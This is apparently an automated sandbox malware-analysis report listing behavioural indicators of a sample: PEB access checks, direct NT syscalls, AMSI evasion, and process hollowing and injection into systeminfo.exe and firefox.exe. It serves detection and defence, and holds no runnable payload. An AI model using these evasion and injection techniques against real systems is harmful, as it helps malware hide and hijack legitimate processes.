                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C84260 mov eax, dword ptr fs:[00000030h]17_2_30C84260
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C84260 mov eax, dword ptr fs:[00000030h]17_2_30C84260
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C84260 mov eax, dword ptr fs:[00000030h]17_2_30C84260
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7826B mov eax, dword ptr fs:[00000030h]17_2_30C7826B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC1270 mov eax, dword ptr fs:[00000030h]17_2_30CC1270
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC1270 mov eax, dword ptr fs:[00000030h]17_2_30CC1270
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA9274 mov eax, dword ptr fs:[00000030h]17_2_30CA9274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4D26B mov eax, dword ptr fs:[00000030h]17_2_30D4D26B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4D26B mov eax, dword ptr fs:[00000030h]17_2_30D4D26B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB7208 mov eax, dword ptr fs:[00000030h]17_2_30CB7208
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB7208 mov eax, dword ptr fs:[00000030h]17_2_30CB7208
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D55227 mov eax, dword ptr fs:[00000030h]17_2_30D55227
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7823B mov eax, dword ptr fs:[00000030h]17_2_30C7823B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3B3D0 mov ecx, dword ptr fs:[00000030h]17_2_30D3B3D0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A3C0 mov eax, dword ptr fs:[00000030h]17_2_30C8A3C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A3C0 mov eax, dword ptr fs:[00000030h]17_2_30C8A3C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A3C0 mov eax, dword ptr fs:[00000030h]17_2_30C8A3C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A3C0 mov eax, dword ptr fs:[00000030h]17_2_30C8A3C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A3C0 mov eax, dword ptr fs:[00000030h]17_2_30C8A3C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A3C0 mov eax, dword ptr fs:[00000030h]17_2_30C8A3C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C883C0 mov eax, dword ptr fs:[00000030h]17_2_30C883C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C883C0 mov eax, dword ptr fs:[00000030h]17_2_30C883C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C883C0 mov eax, dword ptr fs:[00000030h]17_2_30C883C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C883C0 mov eax, dword ptr fs:[00000030h]17_2_30C883C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3C3CD mov eax, dword ptr fs:[00000030h]17_2_30D3C3CD
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D553FC mov eax, dword ptr fs:[00000030h]17_2_30D553FC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB63FF mov eax, dword ptr fs:[00000030h]17_2_30CB63FF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3F3E6 mov eax, dword ptr fs:[00000030h]17_2_30D3F3E6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9E3F0 mov eax, dword ptr fs:[00000030h]17_2_30C9E3F0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9E3F0 mov eax, dword ptr fs:[00000030h]17_2_30C9E3F0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9E3F0 mov eax, dword ptr fs:[00000030h]17_2_30C9E3F0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA438F mov eax, dword ptr fs:[00000030h]17_2_30CA438F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA438F mov eax, dword ptr fs:[00000030h]17_2_30CA438F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D5539D mov eax, dword ptr fs:[00000030h]17_2_30D5539D
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7E388 mov eax, dword ptr fs:[00000030h]17_2_30C7E388
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7E388 mov eax, dword ptr fs:[00000030h]17_2_30C7E388
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7E388 mov eax, dword ptr fs:[00000030h]17_2_30C7E388
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C78397 mov eax, dword ptr fs:[00000030h]17_2_30C78397
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C78397 mov eax, dword ptr fs:[00000030h]17_2_30C78397
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C78397 mov eax, dword ptr fs:[00000030h]17_2_30C78397
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CD739A mov eax, dword ptr fs:[00000030h]17_2_30CD739A
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CD739A mov eax, dword ptr fs:[00000030h]17_2_30CD739A
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB33A0 mov eax, dword ptr fs:[00000030h]17_2_30CB33A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB33A0 mov eax, dword ptr fs:[00000030h]17_2_30CB33A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA33A5 mov eax, dword ptr fs:[00000030h]17_2_30CA33A5
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4A352 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C7D34C | mov eax, dword ptr fs:[00000030h] (x2)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D0035C | mov eax, dword ptr fs:[00000030h] (x5), mov ecx, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D55341 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C79353 | mov eax, dword ptr fs:[00000030h] (x2)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D02349 | mov eax, dword ptr fs:[00000030h] (x15)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D2437C | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D3F367 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C87370 | mov eax, dword ptr fs:[00000030h] (x3)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CBA30B | mov eax, dword ptr fs:[00000030h] (x3)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C7C310 | mov ecx, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CA0310 | mov ecx, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D0930B | mov eax, dword ptr fs:[00000030h] (x3)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CAF32A | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C77330 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D4132D | mov eax, dword ptr fs:[00000030h] (x2)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D554DB | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C804E5 | mov ecx, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D294E0 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C7B480 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C89486 | mov eax, dword ptr fs:[00000030h] (x2)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D0A4B0 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C864AB | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CB34B0 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CB44B0 | mov ecx, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D3F453 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C8B440 | mov eax, dword ptr fs:[00000030h] (x6)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CBE443 | mov eax, dword ptr fs:[00000030h] (x8)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CA245A | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C7645D | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C81460 | mov eax, dword ptr fs:[00000030h] (x5)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C9F460 | mov eax, dword ptr fs:[00000030h] (x6)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D5547F | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CAA470 | mov eax, dword ptr fs:[00000030h] (x3)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CA340D | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CB8402 | mov eax, dword ptr fs:[00000030h] (x3)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C7C427 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C7E420 | mov eax, dword ptr fs:[00000030h] (x3)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CBA430 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D535D7 | mov eax, dword ptr fs:[00000030h] (x3)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CBE5CF | mov eax, dword ptr fs:[00000030h] (x2)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CB55C0 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CA95DA | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C865D0 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CBA5D0 | mov eax, dword ptr fs:[00000030h] (x2)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D555C9 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CBC5ED | mov eax, dword ptr fs:[00000030h] (x2)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C825E0 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CAE5E7 | mov eax, dword ptr fs:[00000030h] (x8)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CA15F4 | mov eax, dword ptr fs:[00000030h] (x6)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CB4588 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D0B594 | mov eax, dword ptr fs:[00000030h] (x2)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C7758F | mov eax, dword ptr fs:[00000030h] (x3)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C82582 | mov eax, dword ptr fs:[00000030h] (x1), mov ecx, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CBE59C | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CA15A9 | mov eax, dword ptr fs:[00000030h] (x5)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D135BA | mov eax, dword ptr fs:[00000030h] (x4)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D3F5BE | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D005A7 | mov eax, dword ptr fs:[00000030h] (x3)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CAF5B0 | mov eax, dword ptr fs:[00000030h] (x9)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CA45B1 | mov eax, dword ptr fs:[00000030h] (x2)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C88550 | mov eax, dword ptr fs:[00000030h] (x2)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CB656A | mov eax, dword ptr fs:[00000030h] (x3)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C7B562 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CBB570 | mov eax, dword ptr fs:[00000030h] (x2)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CB7505 | mov eax, dword ptr fs:[00000030h] (x1), mov ecx, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D54500 | mov eax, dword ptr fs:[00000030h] (x7)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D55537 | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CAE53E | mov eax, dword ptr fs:[00000030h] (x5)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D2F525 | mov eax, dword ptr fs:[00000030h] (x7)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CBD530 | mov eax, dword ptr fs:[00000030h] (x2)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C90535 | mov eax, dword ptr fs:[00000030h] (x6)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30D3B52F | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C8D534 | mov eax, dword ptr fs:[00000030h] (x6)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30CB16CF | mov eax, dword ptr fs:[00000030h] (x1)
                        Source: C:\Users\user\Links\iaoqralA.pif | Code function: 17_2_30C8B6C0 | mov eax, dword ptr fs:[00000030h] (x5)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

                        HIPS / PFW / Operating System Protection Evasion

                        Source: Yara match | File source: amsi32_2424.amsi.csv, type: OTHER
                        Source: C:\Users\user\AppData\Roaming\csrss.exe | Memory allocated: C:\Users\user\Links\iaoqralA.pif base: 400000 protect: page execute and read and write
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtCreateFile: Direct from: 0x77752FEC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtOpenFile: Direct from: 0x77752DCC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtSetInformationThread: Direct from: 0x77752ECC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtQueryInformationToken: Direct from: 0x77752CAC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtTerminateThread: Direct from: 0x77752FCC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtProtectVirtualMemory: Direct from: 0x77752F9C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtSetInformationProcess: Direct from: 0x77752C5C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtNotifyChangeKey: Direct from: 0x77753C2C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtOpenKeyEx: Direct from: 0x77752B9C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtOpenSection: Direct from: 0x77752E0C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtProtectVirtualMemory: Direct from: 0x77747B2E
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtAllocateVirtualMemory: Direct from: 0x777548EC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtQueryVolumeInformationFile: Direct from: 0x77752F2C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtQuerySystemInformation: Direct from: 0x777548CC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtAllocateVirtualMemory: Direct from: 0x77752BEC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtDeviceIoControlFile: Direct from: 0x77752AEC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtCreateUserProcess: Direct from: 0x7775371C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtWriteVirtualMemory: Direct from: 0x7775490C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtQueryInformationProcess: Direct from: 0x77752C26
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtResumeThread: Direct from: 0x77752FBC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtReadVirtualMemory: Direct from: 0x77752E8C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtCreateKey: Direct from: 0x77752C6C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtSetInformationThread: Direct from: 0x77752B4C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtQueryAttributesFile: Direct from: 0x77752E6C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtAllocateVirtualMemory: Direct from: 0x77753C9C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtClose: Direct from: 0x77752B6C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtCreateMutant: Direct from: 0x777535CC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtWriteVirtualMemory: Direct from: 0x77752E3C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtMapViewOfSection: Direct from: 0x77752D1C
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtResumeThread: Direct from: 0x777536AC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtReadFile: Direct from: 0x77752ADC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtQuerySystemInformation: Direct from: 0x77752DFC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtDelayExecution: Direct from: 0x77752DDC
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe | NtAllocateVirtualMemory: Direct from: 0x77752BFC
                        Source: C:\Users\user\Links\iaoqralA.pif | Section loaded: NULL target: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe protection: execute and read and write
                        Source: C:\Users\user\Links\iaoqralA.pifSection loaded: NULL target: C:\Windows\SysWOW64\systeminfo.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe protection: read writeJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeThread register set: target process: 7240Jump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeThread APC queued: target process: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection unmapped: C:\Users\user\Links\iaoqralA.pif base address: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeMemory written: C:\Users\user\Links\iaoqralA.pif base: 287008Jump to behavior
